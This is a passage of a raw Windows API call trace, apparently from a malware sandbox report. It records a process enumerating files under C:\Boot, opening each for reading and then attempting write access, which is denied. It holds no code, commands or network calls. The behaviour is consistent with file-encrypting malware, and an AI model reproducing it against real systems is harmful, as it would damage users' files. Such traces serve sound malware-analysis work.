[0070.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0070.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0070.561] AreFileApisANSI () returned 1 [0070.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0070.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68b30 [0070.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68b30, cchWideChar=33 | out: lpWideCharStr="C:\\Boot\\qps-ploc\\bootmgr.exe.mui") returned 33 [0070.561] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.562] GetFileType (hFile=0x41c) returned 0x1 [0070.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0070.562] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.562] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.562] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.563] CloseHandle (hObject=0x41c) returned 1 [0070.563] AreFileApisANSI () returned 1 [0070.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0070.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x69300 [0070.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=33 | out: lpWideCharStr="C:\\Boot\\qps-ploc\\bootmgr.exe.mui") returned 33 [0070.563] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\bootmgr.exe.mui" (normalized: "c:\\boot\\qps-ploc\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.563] GetLastError () returned 0x5 [0070.563] GetLastError () returned 0x5 [0070.563] SetLastError (dwErrCode=0x5) [0070.563] GetLastError () returned 0x5 [0070.563] SetLastError (dwErrCode=0x5) [0070.563] GetLastError () returned 0x5 [0070.563] SetLastError (dwErrCode=0x5) [0070.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0070.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0070.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0070.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0070.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.563] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.563] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef684d85, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbd1a998, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xd398, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0070.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0070.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0070.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0070.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0070.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0070.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0070.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0070.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0070.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.564] AreFileApisANSI () returned 1 [0070.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\qps-ploc\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\qps-ploc\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 33 [0070.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0070.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0070.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0070.565] AreFileApisANSI () returned 1 [0070.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0070.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68b80 [0070.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=33 | out: lpWideCharStr="C:\\Boot\\qps-ploc\\memtest.exe.mui") returned 33 [0070.565] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.565] GetFileType (hFile=0x41c) returned 0x1 [0070.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0070.565] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.565] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.565] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.566] CloseHandle (hObject=0x41c) returned 1 [0070.566] AreFileApisANSI () returned 1 [0070.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0070.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x693f0 [0070.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e148, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=33 | out: lpWideCharStr="C:\\Boot\\qps-ploc\\memtest.exe.mui") returned 33 [0070.566] CreateFileW (lpFileName="C:\\Boot\\qps-ploc\\memtest.exe.mui" (normalized: "c:\\boot\\qps-ploc\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.566] GetLastError () returned 0x5 [0070.566] GetLastError () returned 0x5 [0070.566] SetLastError (dwErrCode=0x5) [0070.566] GetLastError () returned 0x5 [0070.566] SetLastError (dwErrCode=0x5) [0070.566] GetLastError () returned 0x5 [0070.566] SetLastError (dwErrCode=0x5) [0070.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0070.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0070.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.566] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x40, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6ce50, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x40, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓페")) returned 0 [0070.566] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0070.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0070.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.567] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0070.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.567] AreFileApisANSI () returned 1 [0070.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\Resources", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\Resources", lpUsedDefaultChar=0x0) returned 18 [0070.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.568] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0070.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0070.568] AreFileApisANSI () returned 1 [0070.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0070.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x24) returned 0x7a908 [0070.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x7a908, cchWideChar=18 | out: lpWideCharStr="C:\\Boot\\Resources") returned 18 [0070.568] CreateFileW (lpFileName="C:\\Boot\\Resources" (normalized: "c:\\boot\\resources"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.568] GetLastError () returned 0x5 [0070.568] GetLastError () returned 0x5 [0070.568] SetLastError (dwErrCode=0x5) [0070.568] GetLastError () returned 0x5 [0070.568] SetLastError (dwErrCode=0x5) [0070.568] GetLastError () returned 0x5 [0070.568] SetLastError (dwErrCode=0x5) [0070.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a908 | out: hHeap=0x20000) returned 1 [0070.568] AreFileApisANSI () returned 1 [0070.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0070.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x24) returned 0x7a8a8 [0070.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88388, cbMultiByte=-1, lpWideCharStr=0x7a8a8, cchWideChar=18 | out: lpWideCharStr="C:\\Boot\\Resources") returned 18 [0070.569] CreateFileW (lpFileName="C:\\Boot\\Resources" (normalized: "c:\\boot\\resources"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.569] GetLastError () returned 0x5 [0070.569] GetLastError () returned 0x5 [0070.569] SetLastError (dwErrCode=0x5) [0070.569] GetLastError () returned 0x5 [0070.569] SetLastError (dwErrCode=0x5) [0070.569] GetLastError () returned 0x5 [0070.569] SetLastError (dwErrCode=0x5) [0070.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a8a8 | out: hHeap=0x20000) returned 1 [0070.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0070.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0070.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0070.569] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0070.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0070.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0070.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0070.569] FindFirstFileExW (in: lpFileName="C:\\Boot\\Resources\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x782d0 [0070.570] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.570] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9abff9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef597530, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x169a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootres.dll", cAlternateFileName="")) returned 1 [0070.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0070.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0070.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0070.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0070.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0070.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0070.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0070.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) 